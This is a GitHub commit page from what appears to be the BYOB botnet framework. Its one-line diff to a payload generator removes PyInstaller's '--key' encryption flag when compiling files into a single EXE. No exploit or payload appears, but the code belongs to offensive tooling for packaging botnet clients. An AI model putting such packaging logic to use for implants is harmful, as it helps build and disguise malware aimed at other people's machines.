Skip to content

Commit

Permalink
Disabled encryption of compiled EXE files due to pyinstaller/pyinstal…
Browse files Browse the repository at this point in the history
  • Loading branch information
malwaredllc committed Apr 14, 2020
1 parent e357890 commit 6b8cc7b
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion byob/core/generators.py
Expand Up @@ -236,7 +236,7 @@ def freeze(filename, icon=None, hidden=None):
# fspec = os.path.join(path, name + '.spec')
# with open(fspec, 'w') as fp:
# fp.write(spec)
process = subprocess.Popen('{0} -m PyInstaller --onefile --key {1} {2}'.format(sys.executable, key, filename), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True)
process = subprocess.Popen('{0} -m PyInstaller --onefile {1}'.format(sys.executable, filename), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True)
while True:
try:
line = process.stderr.readline().rstrip()
Expand Down

0 comments on commit 6b8cc7b

Please sign in to comment.